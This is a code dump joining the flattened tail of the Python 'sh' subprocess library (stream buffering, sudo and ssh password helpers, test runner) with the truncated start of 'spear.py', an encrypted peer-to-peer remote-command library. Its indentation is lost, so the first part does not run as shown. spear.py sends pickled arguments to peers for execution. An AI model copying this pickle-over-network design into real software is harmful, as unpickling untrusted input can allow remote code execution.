RUNNING_TESTS: # pragma: no cover alive = True exit_code = None while alive: quit_thread.wait(1) alive, exit_code = is_alive() handle_exit_code(exit_code) def output_thread(log, stdout, stderr, timeout_event, is_alive, quit_thread, stop_output_event): """ this function is run in a separate thread. it reads from the process's stdout stream (a streamreader), and waits for it to claim that its done """ poller = Poller() if stdout is not None: poller.register_read(stdout) if stderr is not None: poller.register_read(stderr) # this is our poll loop for polling stdout or stderr that is ready to # be read and processed. if one of those streamreaders indicate that it # is done altogether being read from, we remove it from our list of # things to poll. when no more things are left to poll, we leave this # loop and clean up while poller: changed = no_interrupt(poller.poll, 0.1) for f, events in changed: if events & (POLLER_EVENT_READ | POLLER_EVENT_HUP): log.debug("%r ready to be read from", f) done = f.read() if done: poller.unregister(f) elif events & POLLER_EVENT_ERROR: # for some reason, we have to just ignore streams that have had an # error. i'm not exactly sure why, but don't remove this until we # figure that out, and create a test for it pass if timeout_event and timeout_event.is_set(): break if stop_output_event.is_set(): break # we need to wait until the process is guaranteed dead before closing our # outputs, otherwise SIGPIPE alive, _ = is_alive() while alive: quit_thread.wait(1) alive, _ = is_alive() if stdout: stdout.close() if stderr: stderr.close() class DoneReadingForever(Exception): pass class NotYetReadyToRead(Exception): pass def determine_how_to_read_input(input_obj): """ given some kind of input object, return a function that knows how to read chunks of that input object. each reader function should return a chunk and raise a DoneReadingForever exception, or return None, when there's no more data to read NOTE: the function returned does not need to care much about the requested buffering type (eg, unbuffered vs newline-buffered). the StreamBufferer will take care of that. these functions just need to return a reasonably-sized chunk of data. """ if isinstance(input_obj, Queue): log_msg = "queue" get_chunk = get_queue_chunk_reader(input_obj) elif callable(input_obj): log_msg = "callable" get_chunk = get_callable_chunk_reader(input_obj) # also handles stringio elif hasattr(input_obj, "read"): log_msg = "file descriptor" get_chunk = get_file_chunk_reader(input_obj) elif isinstance(input_obj, basestring): log_msg = "string" get_chunk = get_iter_string_reader(input_obj) elif isinstance(input_obj, bytes): log_msg = "bytes" get_chunk = get_iter_string_reader(input_obj) elif isinstance(input_obj, GeneratorType): log_msg = "generator" get_chunk = get_iter_chunk_reader(iter(input_obj)) elif input_obj is None: log_msg = "None" def raise_(): raise DoneReadingForever get_chunk = raise_ else: try: it = iter(input_obj) except TypeError: raise Exception("unknown input object") else: log_msg = "general iterable" get_chunk = get_iter_chunk_reader(it) return get_chunk, log_msg def get_queue_chunk_reader(stdin): def fn(): try: chunk = stdin.get(True, 0.1) except Empty: raise NotYetReadyToRead if chunk is None: raise DoneReadingForever return chunk return fn def get_callable_chunk_reader(stdin): def fn(): try: data = stdin() except DoneReadingForever: raise if not data: raise DoneReadingForever return data return fn def get_iter_string_reader(stdin): """ return an iterator that returns a chunk of a string every time it is called. notice that even though bufsize_type might be line buffered, we're not doing any line buffering here. that's because our StreamBufferer handles all buffering. we just need to return a reasonable-sized chunk. """ bufsize = 1024 iter_str = (stdin[i:i + bufsize] for i in range(0, len(stdin), bufsize)) return get_iter_chunk_reader(iter_str) def get_iter_chunk_reader(stdin): def fn(): try: if IS_PY3: chunk = stdin.__next__() else: chunk = stdin.next() return chunk except StopIteration: raise DoneReadingForever return fn def get_file_chunk_reader(stdin): bufsize = 1024 def fn(): # python 3.* includes a fileno on stringios, but accessing it throws an # exception. that exception is how we'll know we can't do a poll on # stdin is_real_file = True if IS_PY3: try: stdin.fileno() except UnsupportedOperation: is_real_file = False # this poll is for files that may not yet be ready to read. we test # for fileno because StringIO/BytesIO cannot be used in a poll if is_real_file and hasattr(stdin, "fileno"): poller = Poller() poller.register_read(stdin) changed = poller.poll(0.1) ready = False for fd, events in changed: if events & (POLLER_EVENT_READ | POLLER_EVENT_HUP): ready = True if not ready: raise NotYetReadyToRead chunk = stdin.read(bufsize) if not chunk: raise DoneReadingForever else: return chunk return fn def bufsize_type_to_bufsize(bf_type): """ for a given bufsize type, return the actual bufsize we will read. notice that although 1 means "newline-buffered", we're reading a chunk size of 1024. this is because we have to read something. we let a StreamBufferer instance handle splitting our chunk on newlines """ # newlines if bf_type == 1: bufsize = 1024 # unbuffered elif bf_type == 0: bufsize = 1 # or buffered by specific amount else: bufsize = bf_type return bufsize class StreamWriter(object): """ StreamWriter reads from some input (the stdin param) and writes to a fd (the stream param). the stdin may be a Queue, a callable, something with the "read" method, a string, or an iterable """ def __init__(self, log, stream, stdin, bufsize_type, encoding, tty_in): self.stream = stream self.stdin = stdin self.log = log self.encoding = encoding self.tty_in = tty_in self.stream_bufferer = StreamBufferer(bufsize_type, self.encoding) self.get_chunk, log_msg = determine_how_to_read_input(stdin) self.log.debug("parsed stdin as a %s", log_msg) def fileno(self): """ defining this allows us to do poll on an instance of this class """ return self.stream def write(self): """ attempt to get a chunk of data to write to our child process's stdin, then write it. the return value answers the questions "are we done writing forever?" """ # get_chunk may sometimes return bytes, and sometimes return strings # because of the nature of the different types of STDIN objects we # support try: chunk = self.get_chunk() if chunk is None: raise DoneReadingForever except DoneReadingForever: self.log.debug("done reading") if self.tty_in: # EOF time try: char = termios.tcgetattr(self.stream)[6][termios.VEOF] except: # noqa: E722 char = chr(4).encode() # normally, one EOF should be enough to signal to an program # that is read()ing, to return 0 and be on your way. however, # some programs are misbehaved, like python3.1 and python3.2. # they don't stop reading sometimes after read() returns 0. # this can be demonstrated with the following program: # # import sys # sys.stdout.write(sys.stdin.read()) # # then type 'a' followed by ctrl-d 3 times. in python # 2.6,2.7,3.3,3.4,3.5,3.6, it only takes 2 ctrl-d to terminate. # however, in python 3.1 and 3.2, it takes all 3. # # so here we send an extra EOF along, just in case. i don't # believe it can hurt anything os.write(self.stream, char) os.write(self.stream, char) return True except NotYetReadyToRead: self.log.debug("received no data") return False # if we're not bytes, make us bytes if IS_PY3 and not isinstance(chunk, bytes): chunk = chunk.encode(self.encoding) for proc_chunk in self.stream_bufferer.process(chunk): self.log.debug("got chunk size %d: %r", len(proc_chunk), proc_chunk[:30]) self.log.debug("writing chunk to process") try: os.write(self.stream, proc_chunk) except OSError: self.log.debug("OSError writing stdin chunk") return True def close(self): self.log.debug("closing, but flushing first") chunk = self.stream_bufferer.flush() self.log.debug("got chunk size %d to flush: %r", len(chunk), chunk[:30]) try: if chunk: os.write(self.stream, chunk) except OSError: pass os.close(self.stream) def determine_how_to_feed_output(handler, encoding, decode_errors): if callable(handler): process, finish = get_callback_chunk_consumer(handler, encoding, decode_errors) # in py3, this is used for bytes elif isinstance(handler, (cStringIO, iocStringIO)): process, finish = get_cstringio_chunk_consumer(handler) # in py3, this is used for unicode elif isinstance(handler, (StringIO, ioStringIO)): process, finish = get_stringio_chunk_consumer(handler, encoding, decode_errors) elif hasattr(handler, "write"): process, finish = get_file_chunk_consumer(handler) else: try: handler = int(handler) except (ValueError, TypeError): def process(chunk): return False # noqa: E731 def finish(): return None # noqa: E731 else: process, finish = get_fd_chunk_consumer(handler) return process, finish def get_fd_chunk_consumer(handler): handler = fdopen(handler, "w", closefd=False) return get_file_chunk_consumer(handler) def get_file_chunk_consumer(handler): if getattr(handler, "encoding", None): def encode(chunk): return chunk.decode(handler.encoding) # noqa: E731 else: def encode(chunk): return chunk # noqa: E731 if hasattr(handler, "flush"): flush = handler.flush else: def flush(): return None # noqa: E731 def process(chunk): handler.write(encode(chunk)) # we should flush on an fd. chunk is already the correctly-buffered # size, so we don't need the fd buffering as well flush() return False def finish(): flush() return process, finish def get_callback_chunk_consumer(handler, encoding, decode_errors): def process(chunk): # try to use the encoding first, if that doesn't work, send # the bytes, because it might be binary try: chunk = chunk.decode(encoding, decode_errors) except UnicodeDecodeError: pass return handler(chunk) def finish(): pass return process, finish def get_cstringio_chunk_consumer(handler): def process(chunk): handler.write(chunk) return False def finish(): pass return process, finish def get_stringio_chunk_consumer(handler, encoding, decode_errors): def process(chunk): handler.write(chunk.decode(encoding, decode_errors)) return False def finish(): pass return process, finish class StreamReader(object): """ reads from some output (the stream) and sends what it just read to the handler. """ def __init__(self, log, stream, handler, buffer, bufsize_type, encoding, decode_errors, pipe_queue=None, save_data=True): self.stream = stream self.buffer = buffer self.save_data = save_data self.encoding = encoding self.decode_errors = decode_errors self.pipe_queue = None if pipe_queue: self.pipe_queue = weakref.ref(pipe_queue) self.log = log self.stream_bufferer = StreamBufferer(bufsize_type, self.encoding, self.decode_errors) self.bufsize = bufsize_type_to_bufsize(bufsize_type) self.process_chunk, self.finish_chunk_processor = \ determine_how_to_feed_output(handler, encoding, decode_errors) self.should_quit = False def fileno(self): """ defining this allows us to do poll on an instance of this class """ return self.stream def close(self): chunk = self.stream_bufferer.flush() self.log.debug("got chunk size %d to flush: %r", len(chunk), chunk[:30]) if chunk: self.write_chunk(chunk) self.finish_chunk_processor() if self.pipe_queue and self.save_data: self.pipe_queue().put(None) os.close(self.stream) def write_chunk(self, chunk): # in PY3, the chunk coming in will be bytes, so keep that in mind if not self.should_quit: self.should_quit = self.process_chunk(chunk) if self.save_data: self.buffer.append(chunk) if self.pipe_queue: self.log.debug("putting chunk onto pipe: %r", chunk[:30]) self.pipe_queue().put(chunk) def read(self): # if we're PY3, we're reading bytes, otherwise we're reading # str try: chunk = no_interrupt(os.read, self.stream, self.bufsize) except OSError as e: self.log.debug("got errno %d, done reading", e.errno) return True if not chunk: self.log.debug("got no chunk, done reading") return True self.log.debug("got chunk size %d: %r", len(chunk), chunk[:30]) for chunk in self.stream_bufferer.process(chunk): self.write_chunk(chunk) class StreamBufferer(object): """ this is used for feeding in chunks of stdout/stderr, and breaking it up into chunks that will actually be put into the internal buffers. for example, if you have two processes, one being piped to the other, and you want that, first process to feed lines of data (instead of the chunks however they come in), OProc will use an instance of this class to chop up the data and feed it as lines to be sent down the pipe """ def __init__(self, buffer_type, encoding=DEFAULT_ENCODING, decode_errors="strict"): # 0 for unbuffered, 1 for line, everything else for that amount self.type = buffer_type self.buffer = [] self.n_buffer_count = 0 self.encoding = encoding self.decode_errors = decode_errors # this is for if we change buffering types. if we change from line # buffered to unbuffered, its very possible that our self.buffer list # has data that was being saved up (while we searched for a newline). # we need to use that up, so we don't lose it self._use_up_buffer_first = False # the buffering lock is used because we might change the buffering # types from a different thread. for example, if we have a stdout # callback, we might use it to change the way stdin buffers. so we # lock self._buffering_lock = threading.RLock() self.log = Logger("stream_bufferer") def change_buffering(self, new_type): # TODO, when we stop supporting 2.6, make this a with context self.log.debug("acquiring buffering lock for changing buffering") self._buffering_lock.acquire() self.log.debug("got buffering lock for changing buffering") try: if new_type == 0: self._use_up_buffer_first = True self.type = new_type finally: self._buffering_lock.release() self.log.debug("released buffering lock for changing buffering") def process(self, chunk): # MAKE SURE THAT THE INPUT IS PY3 BYTES # THE OUTPUT IS ALWAYS PY3 BYTES # TODO, when we stop supporting 2.6, make this a with context self.log.debug("acquiring buffering lock to process chunk (buffering: %d)", self.type) self._buffering_lock.acquire() self.log.debug("got buffering lock to process chunk (buffering: %d)", self.type) try: # unbuffered if self.type == 0: if self._use_up_buffer_first: self._use_up_buffer_first = False to_write = self.buffer self.buffer = [] to_write.append(chunk) return to_write return [chunk] # line buffered elif self.type == 1: total_to_write = [] nl = "\n".encode(self.encoding) while True: newline = chunk.find(nl) if newline == -1: break chunk_to_write = chunk[:newline + 1] if self.buffer: chunk_to_write = b"".join(self.buffer) + chunk_to_write self.buffer = [] self.n_buffer_count = 0 chunk = chunk[newline + 1:] total_to_write.append(chunk_to_write) if chunk: self.buffer.append(chunk) self.n_buffer_count += len(chunk) return total_to_write # N size buffered else: total_to_write = [] while True: overage = self.n_buffer_count + len(chunk) - self.type if overage >= 0: ret = "".encode(self.encoding).join(self.buffer) + chunk chunk_to_write = ret[:self.type] chunk = ret[self.type:] total_to_write.append(chunk_to_write) self.buffer = [] self.n_buffer_count = 0 else: self.buffer.append(chunk) self.n_buffer_count += len(chunk) break return total_to_write finally: self._buffering_lock.release() self.log.debug("released buffering lock for processing chunk (buffering: %d)", self.type) def flush(self): self.log.debug("acquiring buffering lock for flushing buffer") self._buffering_lock.acquire() self.log.debug("got buffering lock for flushing buffer") try: ret = "".encode(self.encoding).join(self.buffer) self.buffer = [] return ret finally: self._buffering_lock.release() self.log.debug("released buffering lock for flushing buffer") def with_lock(lock): def wrapped(fn): fn = contextmanager(fn) @contextmanager def wrapped2(*args, **kwargs): with lock: with fn(*args, **kwargs): yield return wrapped2 return wrapped @with_lock(PUSHD_LOCK) def pushd(path): """ pushd changes the actual working directory for the duration of the context, unlike the _cwd arg this will work with other built-ins such as sh.glob correctly """ orig_path = os.getcwd() os.chdir(path) try: yield finally: os.chdir(orig_path) @contextmanager def _args(**kwargs): """ allows us to temporarily override all the special keyword parameters in a with context """ kwargs_str = ",".join(["%s=%r" % (k, v) for k, v in kwargs.items()]) raise DeprecationWarning(""" sh.args() has been deprecated because it was never thread safe. use the following instead: sh2 = sh({kwargs}) sh2.your_command() or sh2 = sh({kwargs}) from sh2 import your_command your_command() """.format(kwargs=kwargs_str)) class Environment(dict): """ this allows lookups to names that aren't found in the global scope to be searched for as a program name. for example, if "ls" isn't found in this module's scope, we consider it a system program and try to find it. we use a dict instead of just a regular object as the base class because the exec() statement used in the run_repl requires the "globals" argument to be a dictionary """ # this is a list of all of the names that the sh module exports that will # not resolve to functions. we don't want to accidentally shadow real # commands with functions/imports that we define in sh.py. for example, # "import time" may override the time system program whitelist = set(( "Command", "RunningCommand", "CommandNotFound", "DEFAULT_ENCODING", "DoneReadingForever", "ErrorReturnCode", "NotYetReadyToRead", "SignalException", "ForkException", "TimeoutException", "StreamBufferer", "__project_url__", "__version__", "__file__", "_args", "pushd", "glob", "contrib", )) def __init__(self, globs, baked_args=None): """ baked_args are defaults for the 'sh' execution context. for example: tmp = sh(_out=StringIO()) 'out' would end up in here as an entry in the baked_args dict """ super(dict, self).__init__() self.globs = globs self.baked_args = baked_args or {} def __getitem__(self, k): if k == 'args': # Let the deprecated '_args' context manager be imported as 'args' k = '_args' # if we're trying to import something real, see if it's in our global scope. # what defines "real" is that it's in our whitelist if k in self.whitelist: return self.globs[k] # somebody tried to be funny and do "from sh import *" if k == "__all__": warnings.warn("Cannot import * from sh. Please import sh or import programs individually.") return [] # check if we're naming a dynamically generated ReturnCode exception exc = get_exc_from_name(k) if exc: return exc # https://github.com/ipython/ipython/issues/2577 # https://github.com/amoffat/sh/issues/97#issuecomment-10610629 if k.startswith("__") and k.endswith("__"): raise AttributeError # is it a custom builtin? builtin = getattr(self, "b_" + k, None) if builtin: return builtin # is it a command? cmd = resolve_command(k, self.baked_args) if cmd: return cmd # how about an environment variable? # this check must come after testing if its a command, because on some # systems, there are an environment variables that can conflict with # command names. # https://github.com/amoffat/sh/issues/238 try: return os.environ[k] except KeyError: pass # nothing found, raise an exception raise CommandNotFound(k) # methods that begin with "b_" are custom builtins and will override any # program that exists in our path. this is useful for things like # common shell builtins that people are used to, but which aren't actually # full-fledged system binaries @staticmethod def b_cd(path=None): if path: os.chdir(path) else: os.chdir(os.path.expanduser('~')) @staticmethod def b_which(program, paths=None): return which(program, paths) class Contrib(ModuleType): # pragma: no cover @classmethod def __call__(cls, name): def wrapper1(fn): @property def cmd_getter(self): cmd = resolve_command(name) if not cmd: raise CommandNotFound(name) new_cmd = fn(cmd) return new_cmd setattr(cls, name, cmd_getter) return fn return wrapper1 mod_name = __name__ + ".contrib" contrib = Contrib(mod_name) sys.modules[mod_name] = contrib @contrib("git") def git(orig): # pragma: no cover """ most git commands play nicer without a TTY """ cmd = orig.bake(_tty_out=False) return cmd @contrib("sudo") def sudo(orig): # pragma: no cover """ a nicer version of sudo that uses getpass to ask for a password, or allows the first argument to be a string password """ prompt = "[sudo] password for %s: " % getpass.getuser() def stdin(): pw = getpass.getpass(prompt=prompt) + "\n" yield pw def process(a, kwargs): password = kwargs.pop("password", None) if password is None: pass_getter = stdin() else: pass_getter = password.rstrip("\n") + "\n" kwargs["_in"] = pass_getter return a, kwargs cmd = orig.bake("-S", _arg_preprocess=process) return cmd @contrib("ssh") def ssh(orig): # pragma: no cover """ An ssh command for automatic password login """ class SessionContent(object): def __init__(self): self.chars = deque(maxlen=50000) self.lines = deque(maxlen=5000) self.line_chars = [] self.last_line = "" self.cur_char = "" def append_char(self, char): if char == "\n": line = self.cur_line self.last_line = line self.lines.append(line) self.line_chars = [] else: self.line_chars.append(char) self.chars.append(char) self.cur_char = char @property def cur_line(self): line = "".join(self.line_chars) return line class SSHInteract(object): def __init__(self, prompt_match, pass_getter, out_handler, login_success): self.prompt_match = prompt_match self.pass_getter = pass_getter self.out_handler = out_handler self.login_success = login_success self.content = SessionContent() # some basic state self.pw_entered = False self.success = False def __call__(self, char, stdin): self.content.append_char(char) if self.pw_entered and not self.success: self.success = self.login_success(self.content) if self.success: return self.out_handler(self.content, stdin) if self.prompt_match(self.content): password = self.pass_getter() stdin.put(password + "\n") self.pw_entered = True def process(a, kwargs): real_out_handler = kwargs.pop("interact") password = kwargs.pop("password", None) login_success = kwargs.pop("login_success", None) prompt_match = kwargs.pop("prompt", None) prompt = "Please enter SSH password: " if prompt_match is None: def prompt_match(content): return content.cur_line.endswith("password: ") # noqa: E731 if password is None: def pass_getter(): return getpass.getpass(prompt=prompt) # noqa: E731 else: def pass_getter(): return password.rstrip("\n") # noqa: E731 if login_success is None: def login_success(content): return True # noqa: E731 kwargs["_out"] = SSHInteract(prompt_match, pass_getter, real_out_handler, login_success) return a, kwargs cmd = orig.bake(_out_bufsize=0, _tty_in=True, _unify_ttys=True, _arg_preprocess=process) return cmd def run_repl(env): # pragma: no cover banner = "\n>> sh v{version}\n>> https://github.com/amoffat/sh\n" print(banner.format(version=__version__)) while True: try: line = raw_input("sh> ") except (ValueError, EOFError): break try: exec(compile(line, "<dummy>", "single"), env, env) except SystemExit: break except: # noqa: E722 print(traceback.format_exc()) # cleans up our last line print("") # this is a thin wrapper around THIS module (we patch sys.modules[__name__]). # this is in the case that the user does a "from sh import whatever" # in other words, they only want to import certain programs, not the whole # system PATH worth of commands. in this case, we just proxy the # import lookup to our Environment class class SelfWrapper(ModuleType): def __init__(self, self_module, baked_args=None): # this is super ugly to have to copy attributes like this, # but it seems to be the only way to make reload() behave # nicely. if i make these attributes dynamic lookups in # __getattr__, reload sometimes chokes in weird ways... super(SelfWrapper, self).__init__( name=getattr(self_module, '__name__', None), doc=getattr(self_module, '__doc__', None) ) for attr in ["__builtins__", "__file__", "__package__"]: setattr(self, attr, getattr(self_module, attr, None)) # python 3.2 (2.7 and 3.3 work fine) breaks on osx (not ubuntu) # if we set this to None. and 3.3 needs a value for __path__ self.__path__ = [] self.__self_module = self_module self.__env = Environment(globals(), baked_args=baked_args) def __getattr__(self, name): return self.__env[name] def __call__(self, **kwargs): """ returns a new SelfWrapper object, where all commands spawned from it have the baked_args kwargs set on them by default """ baked_args = self.__env.baked_args.copy() baked_args.update(kwargs) new_mod = self.__class__(self.__self_module, baked_args) # inspect the line in the parent frame that calls and assigns the new sh # variable, and get the name of the new variable we're assigning to. # this is very brittle and pretty much a sin. but it works in 99% of # the time and the tests pass # # the reason we need to do this is because we need to remove the old # cached module from sys.modules. if we don't, it gets re-used, and any # old baked params get used, which is not what we want parent = inspect.stack()[1] try: code = parent[4][0].strip() except TypeError: # On the REPL or from the commandline, we don't get the source code in the # top stack frame # Older versions of pypy don't set parent[1] the same way as CPython or newer versions # of Pypy so we have to special case that too. if parent[1] in ('<stdin>', '<string>') or ( parent[1] == '<module>' and platform.python_implementation().lower() == 'pypy'): # This depends on things like Python's calling convention and the layout of stack # frames but it's a fix for a bug in a very cornery cornercase so.... module_name = parent[0].f_code.co_names[-1] else: raise else: parsed = ast.parse(code) try: module_name = parsed.body[0].targets[0].id except Exception: # Diagnose what went wrong if not isinstance(parsed.body[0], ast.Assign): raise RuntimeError("A new execution context must be assigned to a variable") raise if module_name == __name__: raise RuntimeError("Cannot use the name '%s' as an execution context" % __name__) sys.modules.pop(module_name, None) return new_mod def in_importlib(frame): """ helper for checking if a filename is in importlib guts """ return frame.f_code.co_filename == "<frozen importlib._bootstrap>" def register_importer(): """ registers our fancy importer that can let us import from a module name, like: import sh tmp = sh() from tmp import ls """ def test(importer_cls): try: return importer_cls.__class__.__name__ == ModuleImporterFromVariables.__name__ except AttributeError: # ran into importer which is not a class instance return False already_registered = any([True for i in sys.meta_path if test(i)]) if not already_registered: importer = ModuleImporterFromVariables(restrict_to=[SelfWrapper.__name__], ) sys.meta_path.insert(0, importer) return not already_registered def fetch_module_from_frame(name, frame): mod = frame.f_locals.get(name, frame.f_globals.get(name, None)) return mod class ModuleImporterFromVariables(object): """ a fancy importer that allows us to import from a variable that was recently set in either the local or global scope, like this: sh2 = sh(_timeout=3) from sh2 import ls """ def __init__(self, restrict_to=None): self.restrict_to = set(restrict_to or set()) def find_module(self, mod_fullname, path=None): """ mod_fullname doubles as the name of the VARIABLE holding our new sh context. for example: derp = sh() from derp import ls here, mod_fullname will be "derp". keep that in mind as we go through the rest of this function """ parent_frame = inspect.currentframe().f_back if parent_frame and parent_frame.f_code.co_name == "find_spec": parent_frame = parent_frame.f_back while parent_frame and in_importlib(parent_frame): parent_frame = parent_frame.f_back # Calling PyImport_ImportModule("some_module"); via the C API may not # have a parent frame. Early-out to avoid in_importlib() trying to # get f_code from None when looking for 'some_module'. # This also happens when using gevent apparently. if not parent_frame: return None # this line is saying "hey, does mod_fullname exist as a name we've # defined previously?" the purpose of this is to ensure that # mod_fullname is really a thing we've defined. if we haven't defined # it before, then we "can't" import from it module = fetch_module_from_frame(mod_fullname, parent_frame) if not module: return None # make sure it's a class we're allowed to import from if module.__class__.__name__ not in self.restrict_to: return None return self def find_spec(self, fullname, path=None, target=None): """ find_module() is deprecated since Python 3.4 in favor of find_spec() """ from importlib.machinery import ModuleSpec found = self.find_module(fullname, path) return ModuleSpec(fullname, found) if found is not None else None def load_module(self, mod_fullname): parent_frame = inspect.currentframe().f_back while in_importlib(parent_frame): parent_frame = parent_frame.f_back module = fetch_module_from_frame(mod_fullname, parent_frame) # we HAVE to include the module in sys.modules, per the import PEP. # older versions of python were more lenient about this being set, but # not in >= python3.3, unfortunately. this requirement necessitates the # ugly code in SelfWrapper.__call__ sys.modules[mod_fullname] = module module.__loader__ = self return module def run_tests(env, locale, a, version, force_select, **extra_env): # pragma: no cover py_version = "python" py_version += str(version) py_bin = which(py_version) return_code = None poller = "poll" if force_select: poller = "select" if py_bin: print("Testing %s, locale %r, poller: %s" % (py_version.capitalize(), locale, poller)) env["SH_TESTS_USE_SELECT"] = str(int(force_select)) env["LANG"] = locale for k, v in extra_env.items(): env[k] = str(v) cmd = [py_bin, "-W", "ignore", os.path.join(THIS_DIR, "test.py")] + a[1:] print("Running %r" % cmd) return_code = os.spawnve(os.P_WAIT, cmd[0], cmd, env) return return_code def main(): # pragma: no cover from optparse import OptionParser parser = OptionParser() parser.add_option("-e", "--envs", dest="envs", default=None, action="append") parser.add_option("-l", "--locales", dest="constrain_locales", default=None, action="append") options, parsed_args = parser.parse_args() # these are essentially restrictions on what envs/constrain_locales to restrict to for # the tests. if they're empty lists, it means use all available action = None if parsed_args: action = parsed_args[0] if action in ("test", "travis", "tox"): import test coverage = None if test.HAS_UNICODE_LITERAL: try: import coverage except ImportError: pass env = os.environ.copy() env["SH_TESTS_RUNNING"] = "1" if coverage: test.append_module_path(env, coverage) # if we're testing locally, run all versions of python on the system if action == "test": all_versions = ("2.6", "2.7", "3.1", "3.2", "3.3", "3.4", "3.5", "3.6", "3.7", "3.8") # if we're testing on travis or tox, just use the system's default python, since travis will spawn a vm per # python version in our .travis.yml file, and tox will run its matrix via tox.ini else: v = sys.version_info sys_ver = "%d.%d" % (v[0], v[1]) all_versions = (sys_ver,) all_force_select = [True] if HAS_POLL: all_force_select.append(False) all_locales = ("en_US.UTF-8", "C") i = 0 ran_versions = set() for locale in all_locales: # make sure this locale is allowed if options.constrain_locales and locale not in options.constrain_locales: continue for version in all_versions: # make sure this version is allowed if options.envs and version not in options.envs: continue for force_select in all_force_select: env_copy = env.copy() ran_versions.add(version) exit_code = run_tests(env_copy, locale, parsed_args, version, force_select, SH_TEST_RUN_IDX=i) if exit_code is None: print("Couldn't find %s, skipping" % version) elif exit_code != 0: print("Failed for %s, %s" % (version, locale)) exit(1) i += 1 print("Tested Python versions: %s" % ",".join(sorted(list(ran_versions)))) else: env = Environment(globals()) run_repl(env) if __name__ == "__main__": # pragma: no cover # we're being run as a stand-alone script main() else: # we're being imported from somewhere sys.modules[__name__] = SelfWrapper(sys.modules[__name__]) register_importer()
spear.py
from asyncio.streams import StreamWriter from socket import * import asyncio from cryptography.fernet import Fernet, InvalidToken import rsa import hashlib import random import time import functools import threading import base64 import json from concurrent.futures import ThreadPoolExecutor import pickle import traceback import inspect def check_port(port): c_sock = socket(AF_INET, SOCK_STREAM) res = c_sock.connect_ex(('127.0.0.1', port)) == 0 c_sock.close() return res def free_port(): free_socket = socket(AF_INET, SOCK_STREAM) free_socket.bind(('0.0.0.0', 0)) free_socket.listen(5) port = free_socket.getsockname()[1] free_socket.close() return port def ip(): return gethostbyname(gethostname()) class Peer: def __init__(self, originator, target='*', thread_count=None, timeout=1e99): self.originator = originator if target == '*': self.peers = {} for p in originator.peers['local'].keys(): self.peers[p] = originator.peers['local'][p] for p in originator.peers['remote'].keys(): if not p in self.peers.keys(): self.peers[p] = originator.peers['remote'][p] elif type(target) == list: self.peers = {x['id']: x for x in [ originator.find_peer(i) for i in target]} else: self.peers = {} peer = originator.find_peer(target) self.peers[peer['id']] = peer self.thread_count = thread_count self.timeout = timeout def command_one(self, target, path, args=[], kwargs={}): try: peer = self.peers[target] temp_key = Fernet.generate_key() if peer['type'] == 'local': packet_raw = { 'originator': self.originator.id, 'originator_name': self.originator.name, 'originator_key': base64.urlsafe_b64encode(self.originator.public.save_pkcs1()).decode('utf-8'), 'originator_type': 'local', 'originator_ip': [ip(), self.originator.service_port], 'target': target, 'path': path, 'args': [base64.urlsafe_b64encode(pickle.dumps(arg)).decode('utf-8') for arg in args], 'kwargs': {key: base64.urlsafe_b64encode(pickle.dumps(kwargs[key])).decode('utf-8') for key in kwargs.keys()} } encoded_packet = base64.urlsafe_b64encode( json.dumps(packet_raw).encode('utf-8')) encrypted_packet = base64.urlsafe_b64encode( Fernet(temp_key).encrypt(encoded_packet)) encrypted_key = base64.urlsafe_b64encode( rsa.encrypt(temp_key, peer['public_key'])) assembled_packet = encrypted_key + \ '§'.encode('utf-8') + encrypted_packet if self.originator.network_encryption: assembled_packet = base64.urlsafe_b64encode( self.originator.network_encryption.encrypt(assembled_packet)) temp_socket = create_connection( (peer['address'].split(':')[0], int(peer['address'].split(':')[1]))) temp_socket.sendall(assembled_packet+b'\n') response = b'' start = time.time() while True and time.time() < start + self.timeout: data = temp_socket.recv(1024) if len(data) == 0: break response += data.strip(b'\n') if time.time() >= start + self.timeout: raise TimeoutError if self.originator.network_encryption: response = self.originator.network_encryption.decrypt(base64.urlsafe_b64decode(response)) response = base64.urlsafe_b64decode(response) response = Fernet(temp_key).decrypt(response) response = base64.urlsafe_b64decode(response).decode('utf-8') response = json.loads(response) return response else: relay = random.choice(peer['relays']) if ':' in relay: relay = [relay.split(':')[0], int(relay.split(':')[1])] else: relay = [relay, 2201] relay_str = relay[0] + ':' + str(relay[1]) packet_raw = { 'type': 'command', 'originator': self.originator.id, 'originator_name': self.originator.name, 'originator_key': base64.urlsafe_b64encode(self.originator.public.save_pkcs1()).decode('utf-8'), 'originator_type': 'remote', 'originator_relay': relay, 'target': target, 'path': path, 'args': [base64.urlsafe_b64encode(pickle.dumps(arg)).decode('utf-8') for arg in args], 'kwargs': {key: base64.urlsafe_b64encode(pickle.dumps(kwargs[key])).decode('utf-8') for key in kwargs.keys()} } encoded_packet = base64.urlsafe_b64encode( json.dumps(packet_raw).encode('utf-8')) encrypted_packet = base64.urlsafe_b64encode( Fernet(temp_key).encrypt(encoded_packet)) encrypted_key = base64.urlsafe_b64encode( rsa.encrypt(temp_key, peer['public_key'])) assembled_packet = encrypted_key + \ '§'.encode('utf-8') + encrypted_packet if self.originator.network_encryption: assembled_packet = base64.urlsafe_b64encode( self.originator.network_encryption.encrypt(assembled_packet)) block_id = hashlib.sha256(str(time.time() + random.uniform(-1,1)).encode('utf-8')).hexdigest() try: sock = create_connection(relay, timeout=2) except TimeoutError: self.originator.relays[relay_str]['public_key'] = None return packet = json.dumps({ 'originator': self.originator.id, 'target': target, 'network': self.originator.network_name, 'id': block_id, 'data': assembled_packet.decode('utf-8') }) packet = 'CMND:' + packet tfk = Fernet.generate_key() tempfernet = Fernet(tfk) enc = rsa.encrypt(tfk, self.originator.relays[relay_str]['public_key']) to_send = base64.urlsafe_b64encode( enc)+'§'.encode('utf-8')+base64.urlsafe_b64encode(tempfernet.encrypt(packet.encode('utf-8')))+b'\n' sock.sendall(to_send) packet_response = '' while True: dat = sock.recv(1024) if not dat: break packet_response += dat.decode('utf-8').strip() sock.close() if packet_response == 'error': self.originator.relays[relay_str]['public_key'] = None return 'error' decrypted = tempfernet.decrypt( base64.urlsafe_b64decode(packet_response.encode('utf-8'))) if decrypted == 'error': print('Encryption error') start = time.time() while True and time.time() < start + self.timeout: if block_id in self.originator.responses.keys(): break if time.time() >= start + self.timeout: raise TimeoutError response = self.originator.responses[block_id]['data'].encode('utf-8') if self.originator.network_encryption: response = self.originator.network_encryption.decrypt(base64.urlsafe_b64decode(response)) response = base64.urlsafe_b64decode(response) response = Fernet(temp_key).decrypt(response) response = base64.urlsafe_b64decode(response).decode('utf-8') response = json.loads(response) del self.originator.responses[block_id] return response except: traceback.print_exc() def command(self, path, *args, **kwargs): with ThreadPoolExecutor(max_workers=self.thread_count) as executor: results = {pid: executor.submit( self.command_one, pid, path, args=args, kwargs=kwargs) for pid in 